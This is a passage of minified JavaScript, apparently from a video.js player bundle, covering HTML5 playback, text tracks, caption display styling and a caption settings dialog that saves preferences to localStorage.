return this.el_.defaultMuted},b.prototype.playbackRate=function(){return this.el_.playbackRate},b.prototype.played=function(){return this.el_.played},b.prototype.setPlaybackRate=function(a){this.el_.playbackRate=a},b.prototype.networkState=function(){return this.el_.networkState},b.prototype.readyState=function(){return this.el_.readyState},b.prototype.videoWidth=function(){return this.el_.videoWidth},b.prototype.videoHeight=function(){return this.el_.videoHeight},b.prototype.textTracks=function(){return this.featuresNativeTextTracks?this.el_.textTracks:a.prototype.textTracks.call(this)},b.prototype.addTextTrack=function(b,c,d){return this.featuresNativeTextTracks?this.el_.addTextTrack(b,c,d):a.prototype.addTextTrack.call(this,b,c,d)},b.prototype.addRemoteTextTrack=function(){var b=void 0===arguments[0]?{}:arguments[0];if(!this.featuresNativeTextTracks)return a.prototype.addRemoteTextTrack.call(this,b);var c=v["default"].createElement("track");return b.kind&&(c.kind=b.kind),b.label&&(c.label=b.label),(b.language||b.srclang)&&(c.srclang=b.language||b.srclang),b["default"]&&(c["default"]=b["default"]),b.id&&(c.id=b.id),b.src&&(c.src=b.src),this.el().appendChild(c),c.track.mode="metadata"===c.track.kind?"hidden":"disabled",c.onload=function(){var a=c.track;c.readyState>=2&&("metadata"===a.kind&&"hidden"!==a.mode?a.mode="hidden":"metadata"!==a.kind&&"disabled"!==a.mode&&(a.mode="disabled"),c.onload=null)},this.remoteTextTracks().addTrack_(c.track),c},b.prototype.removeRemoteTextTrack=function(b){if(!this.featuresNativeTextTracks)return a.prototype.removeRemoteTextTrack.call(this,b);var c,d;for(this.remoteTextTracks().removeTrack_(b),c=this.el().querySelectorAll("track"),d=0;d<c.length;d++)if(c[d]===b||c[d].track===b){c[d].parentNode.removeChild(c[d]);break}},b}(h["default"]);C.TEST_VID=v["default"].createElement("video");var D=v["default"].createElement("track");D.kind="captions",D.srclang="en",D.label="English",C.TEST_VID.appendChild(D),C.isSupported=function(){try{C.TEST_VID.volume=.5}catch(a){return!1}return!!C.TEST_VID.canPlayType},h["default"].withSourceHandlers(C),C.nativeSourceHandler={},C.nativeSourceHandler.canHandleSource=function(a){function b(a){try{return C.TEST_VID.canPlayType(a)}catch(b){return""}}var c;return a.type?b(a.type):a.src?(c=n.getFileExtension(a.src),b("video/"+c)):""},C.nativeSourceHandler.handleSource=function(a,b){b.setSrc(a.src)},C.nativeSourceHandler.dispose=function(){},C.registerSourceHandler(C.nativeSourceHandler),C.canControlVolume=function(){var a=C.TEST_VID.volume;return C.TEST_VID.volume=a/2+.1,a!==C.TEST_VID.volume},C.canControlPlaybackRate=function(){var a=C.TEST_VID.playbackRate;return C.TEST_VID.playbackRate=a/2+.1,a!==C.TEST_VID.playbackRate},C.supportsNativeTextTracks=function(){var a;return a=!!C.TEST_VID.textTracks,a&&C.TEST_VID.textTracks.length>0&&(a="number"!=typeof C.TEST_VID.textTracks[0].mode),a&&t.IS_FIREFOX&&(a=!1),a},C.prototype.featuresVolumeControl=C.canControlVolume(),C.prototype.featuresPlaybackRate=C.canControlPlaybackRate(),C.prototype.movingMediaElementInDOM=!t.IS_IOS,C.prototype.featuresFullscreenResize=!0,C.prototype.featuresProgressEvents=!0,C.prototype.featuresNativeTextTracks=C.supportsNativeTextTracks();var E=void 0,F=/^application\/(?:x-|vnd\.apple\.)mpegurl/i,G=/^video\/mp4/i;C.patchCanPlayType=function(){t.ANDROID_VERSION>=4&&(E||(E=C.TEST_VID.constructor.prototype.canPlayType),C.TEST_VID.constructor.prototype.canPlayType=function(a){return a&&F.test(a)?"maybe":E.call(this,a)}),t.IS_OLD_ANDROID&&(E||(E=C.TEST_VID.constructor.prototype.canPlayType),C.TEST_VID.constructor.prototype.canPlayType=function(a){return a&&G.test(a)?"maybe":E.call(this,a)})},C.unpatchCanPlayType=function(){var a=C.TEST_VID.constructor.prototype.canPlayType;return C.TEST_VID.constructor.prototype.canPlayType=E,E=null,a},C.patchCanPlayType(),C.disposeMediaElement=function(a){if(a){for(a.parentNode&&a.parentNode.removeChild(a);a.hasChildNodes();)a.removeChild(a.firstChild);a.removeAttribute("src"),"function"==typeof a.load&&!function(){try{a.load()}catch(b){}}()}},j["default"].registerComponent("Html5",C),c["default"]=C,b.exports=c["default"]},{"../component":52,"../utils/browser.js":108,"../utils/dom.js":111,"../utils/fn.js":113,"../utils/log.js":116,"../utils/merge-options.js":117,"../utils/url.js":121,"./tech.js":101,"global/document":1,"global/window":2,"object.assign":44}],100:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component"),h=d(g),i=a("global/window"),j=(d(i),a("../utils/to-title-case.js")),k=d(j),l=function(a){function b(c,d,f){if(e(this,b),a.call(this,c,d,f),d.playerOptions.sources&&0!==d.playerOptions.sources.length)c.src(d.playerOptions.sources);else for(var g=0,i=d.playerOptions.techOrder;g<i.length;g++){var j=k["default"](i[g]),l=h["default"].getComponent(j);if(l&&l.isSupported()){c.loadTech(j);break}}}return f(b,a),b}(h["default"]);h["default"].registerComponent("MediaLoader",l),c["default"]=l,b.exports=c["default"]},{"../component":52,"../utils/to-title-case.js":120,"global/window":2}],101:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}},e=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},f=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var g=a("../component"),h=d(g),i=a("../tracks/text-track"),j=d(i),k=a("../tracks/text-track-list"),l=d(k),m=a("../utils/fn.js"),n=d(m),o=a("../utils/log.js"),p=d(o),q=a("../utils/time-ranges.js"),r=a("../utils/buffer.js"),s=a("global/window"),t=d(s),u=a("global/document"),v=d(u),w=function(a){function b(){var c=void 0===arguments[0]?{}:arguments[0],d=void 0===arguments[1]?function(){}:arguments[1];e(this,b),c.reportTouchActivity=!1,a.call(this,null,c,d),this.hasStarted_=!1,this.on("playing",function(){this.hasStarted_=!0}),this.on("loadstart",function(){this.hasStarted_=!1}),this.textTracks_=c.textTracks,this.featuresProgressEvents||this.manualProgressOn(),this.featuresTimeupdateEvents||this.manualTimeUpdatesOn(),this.initControlsListeners(),(c.nativeCaptions===!1||c.nativeTextTracks===!1)&&(this.featuresNativeTextTracks=!1),this.featuresNativeTextTracks||this.emulateTextTracks(),this.initTextTrackListeners(),this.emitTapEvents()}/*! Time Tracking -------------------------------------------------------------- */
return f(b,a),b.prototype.initControlsListeners=function(){this.ready(function(){this.networkState&&this.networkState()>0&&this.trigger("loadstart")})},b.prototype.manualProgressOn=function(){this.on("durationchange",this.onDurationChange),this.manualProgress=!0,this.one("ready",this.trackProgress)},b.prototype.manualProgressOff=function(){this.manualProgress=!1,this.stopTrackingProgress(),this.off("durationchange",this.onDurationChange)},b.prototype.trackProgress=function(){this.stopTrackingProgress(),this.progressInterval=this.setInterval(n.bind(this,function(){var a=this.bufferedPercent();this.bufferedPercent_!==a&&this.trigger("progress"),this.bufferedPercent_=a,1===a&&this.stopTrackingProgress()}),500)},b.prototype.onDurationChange=function(){this.duration_=this.duration()},b.prototype.buffered=function(){return q.createTimeRange(0,0)},b.prototype.bufferedPercent=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return r.bufferedPercent(this.buffered(),this.duration_)}),b.prototype.stopTrackingProgress=function(){this.clearInterval(this.progressInterval)},b.prototype.manualTimeUpdatesOn=function(){this.manualTimeUpdates=!0,this.on("play",this.trackCurrentTime),this.on("pause",this.stopTrackingCurrentTime)},b.prototype.manualTimeUpdatesOff=function(){this.manualTimeUpdates=!1,this.stopTrackingCurrentTime(),this.off("play",this.trackCurrentTime),this.off("pause",this.stopTrackingCurrentTime)},b.prototype.trackCurrentTime=function(){this.currentTimeInterval&&this.stopTrackingCurrentTime(),this.currentTimeInterval=this.setInterval(function(){this.trigger({type:"timeupdate",target:this,manuallyTriggered:!0})},250)},b.prototype.stopTrackingCurrentTime=function(){this.clearInterval(this.currentTimeInterval),this.trigger({type:"timeupdate",target:this,manuallyTriggered:!0})},b.prototype.dispose=function(){this.manualProgress&&this.manualProgressOff(),this.manualTimeUpdates&&this.manualTimeUpdatesOff(),a.prototype.dispose.call(this)},b.prototype.played=function(){return this.hasStarted_?q.createTimeRange(0,0):q.createTimeRange()},b.prototype.setCurrentTime=function(){this.manualTimeUpdates&&this.trigger({type:"timeupdate",target:this,manuallyTriggered:!0})},b.prototype.initTextTrackListeners=function(){var a=n.bind(this,function(){this.trigger("texttrackchange")}),b=this.textTracks();b&&(b.addEventListener("removetrack",a),b.addEventListener("addtrack",a),this.on("dispose",n.bind(this,function(){b.removeEventListener("removetrack",a),b.removeEventListener("addtrack",a)})))},b.prototype.emulateTextTracks=function(){if(!t["default"].WebVTT&&null!=this.el().parentNode){var a=v["default"].createElement("script");a.src=this.options_["vtt.js"]||"../node_modules/vtt.js/dist/vtt.js",this.el().parentNode.appendChild(a),t["default"].WebVTT=!0}var b=this.textTracks();if(b){var c=n.bind(this,function(){var a=this,c=function(){return a.trigger("texttrackchange")};c();for(var d=0;d<b.length;d++){var e=b[d];e.removeEventListener("cuechange",c),"showing"===e.mode&&e.addEventListener("cuechange",c)}});b.addEventListener("change",c),this.on("dispose",function(){b.removeEventListener("change",c)})}},b.prototype.textTracks=function(){return this.textTracks_=this.textTracks_||new l["default"],this.textTracks_},b.prototype.remoteTextTracks=function(){return this.remoteTextTracks_=this.remoteTextTracks_||new l["default"],this.remoteTextTracks_},b.prototype.addTextTrack=function(a,b,c){if(!a)throw new Error("TextTrack kind is required but was not provided");return x(this,a,b,c)},b.prototype.addRemoteTextTrack=function(a){var b=x(this,a.kind,a.label,a.language,a);return this.remoteTextTracks().addTrack_(b),{track:b}},b.prototype.removeRemoteTextTrack=function(a){this.textTracks().removeTrack_(a),this.remoteTextTracks().removeTrack_(a)},b.prototype.setPoster=function(){},b}(h["default"]);w.prototype.textTracks_;var x=function(a,b,c,d){var e=void 0===arguments[4]?{}:arguments[4],f=a.textTracks();e.kind=b,c&&(e.label=c),d&&(e.language=d),e.tech=a;var g=new j["default"](e);return f.addTrack_(g),g};w.prototype.featuresVolumeControl=!0,w.prototype.featuresFullscreenResize=!1,w.prototype.featuresPlaybackRate=!1,w.prototype.featuresProgressEvents=!1,w.prototype.featuresTimeupdateEvents=!1,w.prototype.featuresNativeTextTracks=!1,w.withSourceHandlers=function(a){a.registerSourceHandler=function(b,c){var d=a.sourceHandlers;d||(d=a.sourceHandlers=[]),void 0===c&&(c=d.length),d.splice(c,0,b)},a.selectSourceHandler=function(b){for(var c=a.sourceHandlers||[],d=void 0,e=0;e<c.length;e++)if(d=c[e].canHandleSource(b))return c[e];return null},a.canPlaySource=function(b){var c=a.selectSourceHandler(b);return c?c.canHandleSource(b):""},a.prototype.setSource=function(b){var c=a.selectSourceHandler(b);return c||(a.nativeSourceHandler?c=a.nativeSourceHandler:p["default"].error("No source hander found for the current source.")),this.disposeSourceHandler(),this.off("dispose",this.disposeSourceHandler),this.currentSource_=b,this.sourceHandler_=c.handleSource(b,this),this.on("dispose",this.disposeSourceHandler),this.originalSeekable_=this.seekable,this.seekable=function(){return this.sourceHandler_&&this.sourceHandler_.seekable?this.sourceHandler_.seekable():this.originalSeekable_.call(this)},this},a.prototype.disposeSourceHandler=function(){this.sourceHandler_&&this.sourceHandler_.dispose&&(this.sourceHandler_.dispose(),this.seekable=this.originalSeekable_)}},h["default"].registerComponent("Tech",w),h["default"].registerComponent("MediaTechController",w),c["default"]=w,b.exports=c["default"]},{"../component":52,"../tracks/text-track":107,"../tracks/text-track-list":105,"../utils/buffer.js":109,"../utils/fn.js":113,"../utils/log.js":116,"../utils/time-ranges.js":119,"global/document":1,"global/window":2}],102:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("../utils/browser.js"),f=d(e),g=a("global/document"),h=d(g),i=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){var b=this;if(f.IS_IE8){b=h["default"].createElement("custom");for(var c in i.prototype)b[c]=i.prototype[c]}return i.prototype.setCues_.call(b,a),Object.defineProperty(b,"length",{get:function(){return this.length_}}),f.IS_IE8?b:void 0});i.prototype.setCues_=function(a){var b=this.length||0,c=0,d=a.length;this.cues_=a,this.length_=a.length;var e=function(a){""+a in this||Object.defineProperty(this,""+a,{get:function(){return this.cues_[a]}})};if(d>b)for(c=b;d>c;c++)e.call(this,c)},i.prototype.getCueById=function(a){for(var b=null,c=0,d=this.length;d>c;c++){var e=this[c];if(e.id===a){b=e;break}}return b},c["default"]=i,b.exports=c["default"]},{"../utils/browser.js":108,"global/document":1}],103:[function(a,b,c){"use strict";function d(a,b){return"rgba("+parseInt(a[1]+a[1],16)+","+parseInt(a[2]+a[2],16)+","+parseInt(a[3]+a[3],16)+","+b+")"}function e(a,b,c){try{a.style[b]=c}catch(d){}}var f=function(a){return a&&a.__esModule?a:{"default":a}},g=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},h=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var i=a("../component"),j=f(i),k=a("../menu/menu.js"),l=(f(k),a("../menu/menu-item.js")),m=(f(l),a("../menu/menu-button.js")),n=(f(m),a("../utils/fn.js")),o=f(n),p=a("global/document"),q=(f(p),a("global/window")),r=f(q),s="#222",t="#ccc",u={monospace:"monospace",sansSerif:"sans-serif",serif:"serif",monospaceSansSerif:'"Andale Mono", "Lucida Console", monospace',monospaceSerif:'"Courier New", monospace',proportionalSansSerif:"sans-serif",proportionalSerif:"serif",casual:'"Comic Sans MS", Impact, fantasy',script:'"Monotype Corsiva", cursive',smallcaps:'"Andale Mono", "Lucida Console", monospace, sans-serif'},v=function(a){function b(c,d,e){g(this,b),a.call(this,c,d,e),c.on("loadstart",o.bind(this,this.toggleDisplay)),c.on("texttrackchange",o.bind(this,this.updateDisplay)),c.ready(o.bind(this,function(){if(c.tech&&c.tech.featuresNativeTextTracks)return void this.hide();c.on("fullscreenchange",o.bind(this,this.updateDisplay));for(var a=this.options_.playerOptions.tracks||[],b=0;b<a.length;b++){var d=a[b];this.player_.addRemoteTextTrack(d)}}))}return h(b,a),b.prototype.toggleDisplay=function(){this.player_.tech&&this.player_.tech.featuresNativeTextTracks?this.hide():this.show()},b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-text-track-display"})},b.prototype.clearDisplay=function(){"function"==typeof r["default"].WebVTT&&r["default"].WebVTT.processCues(r["default"],[],this.el_)},b.prototype.updateDisplay=function(){var a=this.player_.textTracks();if(this.clearDisplay(),a)for(var b=0;b<a.length;b++){var c=a[b];"showing"===c.mode&&this.updateForTrack(c)}},b.prototype.updateForTrack=function(a){if("function"==typeof r["default"].WebVTT&&a.activeCues){for(var b=this.player_.textTrackSettings.getValues(),c=[],f=0;f<a.activeCues.length;f++)c.push(a.activeCues[f]);r["default"].WebVTT.processCues(r["default"],a.activeCues,this.el_);for(var g=c.length;g--;){var h=c[g].displayState;if(b.color&&(h.firstChild.style.color=b.color),b.textOpacity&&e(h.firstChild,"color",d(b.color||"#fff",b.textOpacity)),b.backgroundColor&&(h.firstChild.style.backgroundColor=b.backgroundColor),b.backgroundOpacity&&e(h.firstChild,"backgroundColor",d(b.backgroundColor||"#000",b.backgroundOpacity)),b.windowColor&&(b.windowOpacity?e(h,"backgroundColor",d(b.windowColor,b.windowOpacity)):h.style.backgroundColor=b.windowColor),b.edgeStyle&&("dropshadow"===b.edgeStyle?h.firstChild.style.textShadow="2px 2px 3px "+s+", 2px 2px 4px "+s+", 2px 2px 5px "+s:"raised"===b.edgeStyle?h.firstChild.style.textShadow="1px 1px "+s+", 2px 2px "+s+", 3px 3px "+s:"depressed"===b.edgeStyle?h.firstChild.style.textShadow="1px 1px "+t+", 0 1px "+t+", -1px -1px "+s+", 0 -1px "+s:"uniform"===b.edgeStyle&&(h.firstChild.style.textShadow="0 0 4px "+s+", 0 0 4px "+s+", 0 0 4px "+s+", 0 0 4px "+s)),b.fontPercent&&1!==b.fontPercent){var i=r["default"].parseFloat(h.style.fontSize);h.style.fontSize=i*b.fontPercent+"px",h.style.height="auto",h.style.top="auto",h.style.bottom="2px"}b.fontFamily&&"default"!==b.fontFamily&&("small-caps"===b.fontFamily?h.firstChild.style.fontVariant="small-caps":h.firstChild.style.fontFamily=u[b.fontFamily])}}},b}(j["default"]);j["default"].registerComponent("TextTrackDisplay",v),c["default"]=v,b.exports=c["default"]},{"../component":52,"../menu/menu-button.js":89,"../menu/menu-item.js":90,"../menu/menu.js":91,"../utils/fn.js":113,"global/document":1,"global/window":2}],104:[function(a,b,c){"use strict";c.__esModule=!0;var d={disabled:"disabled",hidden:"hidden",showing:"showing"},e={subtitles:"subtitles",captions:"captions",descriptions:"descriptions",chapters:"chapters",metadata:"metadata"};c.TextTrackMode=d,c.TextTrackKind=e},{}],105:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("../event-emitter"),f=d(e),g=a("../utils/fn.js"),h=d(g),i=a("../utils/browser.js"),j=d(i),k=a("global/document"),l=d(k),m=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a){var b=this;if(j.IS_IE8){b=l["default"].createElement("custom");for(var c in m.prototype)b[c]=m.prototype[c]}a=a||[],b.tracks_=[],Object.defineProperty(b,"length",{get:function(){return this.tracks_.length}});for(var d=0;d<a.length;d++)b.addTrack_(a[d]);return j.IS_IE8?b:void 0});m.prototype=Object.create(f["default"].prototype),m.prototype.constructor=m,m.prototype.allowedEvents_={change:"change",addtrack:"addtrack",removetrack:"removetrack"};for(var n in m.prototype.allowedEvents_)m.prototype["on"+n]=null;m.prototype.addTrack_=function(a){var b=this.tracks_.length;""+b in this||Object.defineProperty(this,b,{get:function(){return this.tracks_[b]}}),a.addEventListener("modechange",h.bind(this,function(){this.trigger("change")})),this.tracks_.push(a),this.trigger({type:"addtrack",track:a})},m.prototype.removeTrack_=function(a){for(var b=void 0,c=0,d=this.length;d>c;c++)if(b=this[c],b===a){this.tracks_.splice(c,1);break}this.trigger({type:"removetrack",track:b})},m.prototype.getTrackById=function(a){for(var b=null,c=0,d=this.length;d>c;c++){var e=this[c];if(e.id===a){b=e;break}}return b},c["default"]=m,b.exports=c["default"]},{"../event-emitter":83,"../utils/browser.js":108,"../utils/fn.js":113,"global/document":1}],106:[function(a,b,c){"use strict";function d(a){var b=void 0;return a.selectedOptions?b=a.selectedOptions[0]:a.options&&(b=a.options[a.options.selectedIndex]),b.value}function e(a,b){if(b){var c=void 0;for(c=0;c<a.options.length;c++){var d=a.options[c];if(d.value===b)break}a.selectedIndex=c}}function f(){var a='<div class="vjs-tracksettings">\n <div class="vjs-tracksettings-colors">\n <div class="vjs-fg-color vjs-tracksetting">\n <label class="vjs-label">Foreground</label>\n <select>\n <option value="">---</option>\n <option value="#FFF">White</option>\n <option value="#000">Black</option>\n <option value="#F00">Red</option>\n <option value="#0F0">Green</option>\n <option value="#00F">Blue</option>\n <option value="#FF0">Yellow</option>\n <option value="#F0F">Magenta</option>\n <option value="#0FF">Cyan</option>\n </select>\n <span class="vjs-text-opacity vjs-opacity">\n <select>\n <option value="">---</option>\n <option value="1">Opaque</option>\n <option value="0.5">Semi-Opaque</option>\n </select>\n </span>\n </div> <!-- vjs-fg-color -->\n <div class="vjs-bg-color vjs-tracksetting">\n <label class="vjs-label">Background</label>\n <select>\n <option value="">---</option>\n <option value="#FFF">White</option>\n <option value="#000">Black</option>\n <option value="#F00">Red</option>\n <option value="#0F0">Green</option>\n <option value="#00F">Blue</option>\n <option value="#FF0">Yellow</option>\n <option value="#F0F">Magenta</option>\n <option value="#0FF">Cyan</option>\n </select>\n <span class="vjs-bg-opacity vjs-opacity">\n <select>\n <option value="">---</option>\n <option value="1">Opaque</option>\n <option value="0.5">Semi-Transparent</option>\n <option value="0">Transparent</option>\n </select>\n </span>\n </div> <!-- vjs-bg-color -->\n <div class="window-color vjs-tracksetting">\n <label class="vjs-label">Window</label>\n <select>\n <option value="">---</option>\n <option value="#FFF">White</option>\n <option value="#000">Black</option>\n <option value="#F00">Red</option>\n <option value="#0F0">Green</option>\n <option value="#00F">Blue</option>\n <option value="#FF0">Yellow</option>\n <option value="#F0F">Magenta</option>\n <option value="#0FF">Cyan</option>\n </select>\n <span class="vjs-window-opacity vjs-opacity">\n <select>\n <option value="">---</option>\n <option value="1">Opaque</option>\n <option value="0.5">Semi-Transparent</option>\n <option value="0">Transparent</option>\n </select>\n </span>\n </div> <!-- vjs-window-color -->\n </div> <!-- vjs-tracksettings -->\n <div class="vjs-tracksettings-font">\n <div class="vjs-font-percent vjs-tracksetting">\n <label class="vjs-label">Font Size</label>\n <select>\n <option value="0.50">50%</option>\n <option value="0.75">75%</option>\n <option value="1.00" selected>100%</option>\n <option value="1.25">125%</option>\n <option value="1.50">150%</option>\n <option value="1.75">175%</option>\n <option value="2.00">200%</option>\n <option value="3.00">300%</option>\n <option value="4.00">400%</option>\n </select>\n </div> <!-- vjs-font-percent -->\n <div class="vjs-edge-style vjs-tracksetting">\n <label class="vjs-label">Text Edge Style</label>\n <select>\n <option value="none">None</option>\n <option value="raised">Raised</option>\n <option value="depressed">Depressed</option>\n <option value="uniform">Uniform</option>\n <option value="dropshadow">Dropshadow</option>\n </select>\n </div> <!-- vjs-edge-style -->\n <div class="vjs-font-family vjs-tracksetting">\n <label class="vjs-label">Font Family</label>\n <select>\n <option value="">Default</option>\n <option value="monospaceSerif">Monospace Serif</option>\n <option value="proportionalSerif">Proportional Serif</option>\n <option value="monospaceSansSerif">Monospace Sans-Serif</option>\n <option value="proportionalSansSerif">Proportional Sans-Serif</option>\n <option value="casual">Casual</option>\n <option value="script">Script</option>\n <option value="small-caps">Small Caps</option>\n </select>\n </div> <!-- vjs-font-family -->\n </div>\n </div>\n <div class="vjs-tracksettings-controls">\n <button class="vjs-default-button">Defaults</button>\n <button class="vjs-done-button">Done</button>\n </div>';return a}var g=function(a){return a&&a.__esModule?a:{"default":a}},h=function(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")},i=function(a,b){if("function"!=typeof b&&null!==b)throw new TypeError("Super expression must either be null or a function, not "+typeof b);a.prototype=Object.create(b&&b.prototype,{constructor:{value:a,enumerable:!1,writable:!0,configurable:!0}}),b&&(a.__proto__=b)};c.__esModule=!0;var j=a("../component"),k=g(j),l=a("../utils/events.js"),m=g(l),n=a("../utils/fn.js"),o=g(n),p=a("../utils/log.js"),q=g(p),r=a("safe-json-parse/tuple"),s=g(r),t=a("global/window"),u=g(t),v=function(a){function b(c,d){h(this,b),a.call(this,c,d),this.hide(),void 0===d.persistTextTrackSettings&&(this.options_.persistTextTrackSettings=this.options_.playerOptions.persistTextTrackSettings),m.on(this.el().querySelector(".vjs-done-button"),"click",o.bind(this,function(){this.saveSettings(),this.hide()})),m.on(this.el().querySelector(".vjs-default-button"),"click",o.bind(this,function(){this.el().querySelector(".vjs-fg-color > select").selectedIndex=0,this.el().querySelector(".vjs-bg-color > select").selectedIndex=0,this.el().querySelector(".window-color > select").selectedIndex=0,this.el().querySelector(".vjs-text-opacity > select").selectedIndex=0,this.el().querySelector(".vjs-bg-opacity > select").selectedIndex=0,this.el().querySelector(".vjs-window-opacity > select").selectedIndex=0,this.el().querySelector(".vjs-edge-style select").selectedIndex=0,this.el().querySelector(".vjs-font-family select").selectedIndex=0,this.el().querySelector(".vjs-font-percent select").selectedIndex=2,this.updateDisplay()})),m.on(this.el().querySelector(".vjs-fg-color > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-bg-color > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".window-color > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-text-opacity > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-bg-opacity > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-window-opacity > select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-font-percent select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-edge-style select"),"change",o.bind(this,this.updateDisplay)),m.on(this.el().querySelector(".vjs-font-family select"),"change",o.bind(this,this.updateDisplay)),this.options_.persistTextTrackSettings&&this.restoreSettings()}return i(b,a),b.prototype.createEl=function(){return a.prototype.createEl.call(this,"div",{className:"vjs-caption-settings vjs-modal-overlay",innerHTML:f()})},b.prototype.getValues=function(){var a=this.el(),b=d(a.querySelector(".vjs-edge-style select")),c=d(a.querySelector(".vjs-font-family select")),e=d(a.querySelector(".vjs-fg-color > select")),f=d(a.querySelector(".vjs-text-opacity > select")),g=d(a.querySelector(".vjs-bg-color > select")),h=d(a.querySelector(".vjs-bg-opacity > select")),i=d(a.querySelector(".window-color > select")),j=d(a.querySelector(".vjs-window-opacity > select")),k=u["default"].parseFloat(d(a.querySelector(".vjs-font-percent > select"))),l={backgroundOpacity:h,textOpacity:f,windowOpacity:j,edgeStyle:b,fontFamily:c,color:e,backgroundColor:g,windowColor:i,fontPercent:k};for(var m in l)(""===l[m]||"none"===l[m]||"fontPercent"===m&&1===l[m])&&delete l[m];return l},b.prototype.setValues=function(a){var b=this.el();e(b.querySelector(".vjs-edge-style select"),a.edgeStyle),e(b.querySelector(".vjs-font-family select"),a.fontFamily),e(b.querySelector(".vjs-fg-color > select"),a.color),e(b.querySelector(".vjs-text-opacity > select"),a.textOpacity),e(b.querySelector(".vjs-bg-color > select"),a.backgroundColor),e(b.querySelector(".vjs-bg-opacity > select"),a.backgroundOpacity),e(b.querySelector(".window-color > select"),a.windowColor),e(b.querySelector(".vjs-window-opacity > select"),a.windowOpacity);var c=a.fontPercent;c&&(c=c.toFixed(2)),e(b.querySelector(".vjs-font-percent > select"),c)},b.prototype.restoreSettings=function(){var a=s["default"](u["default"].localStorage.getItem("vjs-text-track-settings")),b=a[0],c=a[1];b&&q["default"].error(b),c&&this.setValues(c)},b.prototype.saveSettings=function(){if(this.options_.persistTextTrackSettings){var a=this.getValues();try{Object.getOwnPropertyNames(a).length>0?u["default"].localStorage.setItem("vjs-text-track-settings",JSON.stringify(a)):u["default"].localStorage.removeItem("vjs-text-track-settings")}catch(b){}}},b.prototype.updateDisplay=function(){var a=this.player_.getChild("textTrackDisplay");a&&a.updateDisplay()},b}(k["default"]);k["default"].registerComponent("TextTrackSettings",v),c["default"]=v,b.exports=c["default"]},{"../component":52,"../utils/events.js":112,"../utils/fn.js":113,"../utils/log.js":116,"global/window":2,"safe-json-parse/tuple":49}],107:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./text-track-cue-list"),f=d(e),g=a("../utils/fn.js"),h=d(g),i=a("../utils/guid.js"),j=d(i),k=a("../utils/browser.js"),l=d(k),m=a("./text-track-enums"),n=d(m),o=a("../utils/log.js"),p=d(o),q=a("../event-emitter"),r=d(q),s=a("global/document"),t=d(s),u=a("global/window"),v=d(u),w=a("../xhr.js"),x=d(w),y=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){var a=void 0===arguments[0]?{}:arguments[0];if(!a.tech)throw new Error("A tech was not provided.");var b=this;if(l.IS_IE8){b=t["default"].createElement("custom");for(var c in y.prototype)b[c]=y.prototype[c]}b.tech_=a.tech;var d=n.TextTrackMode[a.mode]||"disabled",e=n.TextTrackKind[a.kind]||"subtitles",g=a.label||"",i=a.language||a.srclang||"",k=a.id||"vjs_text_track_"+j.newGUID();("metadata"===e||"chapters"===e)&&(d="hidden"),b.cues_=[],b.activeCues_=[];var m=new f["default"](b.cues_),o=new f["default"](b.activeCues_),p=!1,q=h.bind(b,function(){this.activeCues,p&&(this.trigger("cuechange"),p=!1)});return"disabled"!==d&&b.tech_.on("timeupdate",q),Object.defineProperty(b,"kind",{get:function(){return e},set:Function.prototype}),Object.defineProperty(b,"label",{get:function(){return g},set:Function.prototype}),Object.defineProperty(b,"language",{get:function(){return i},set:Function.prototype}),Object.defineProperty(b,"id",{get:function(){return k},set:Function.prototype}),Object.defineProperty(b,"mode",{get:function(){return d},set:function(a){n.TextTrackMode[a]&&(d=a,"showing"===d&&this.tech_.on("timeupdate",q),this.trigger("modechange"))}}),Object.defineProperty(b,"cues",{get:function(){return this.loaded_?m:null},set:Function.prototype}),Object.defineProperty(b,"activeCues",{get:function(){if(!this.loaded_)return null;if(0===this.cues.length)return o;for(var a=this.tech_.currentTime(),b=[],c=0,d=this.cues.length;d>c;c++){var e=this.cues[c];e.startTime<=a&&e.endTime>=a?b.push(e):e.startTime===e.endTime&&e.startTime<=a&&e.startTime+.5>=a&&b.push(e)}if(p=!1,b.length!==this.activeCues_.length)p=!0;else for(var c=0;c<b.length;c++)-1===B.call(this.activeCues_,b[c])&&(p=!0);return this.activeCues_=b,o.setCues_(this.activeCues_),o},set:Function.prototype}),a.src?A(a.src,b):b.loaded_=!0,l.IS_IE8?b:void 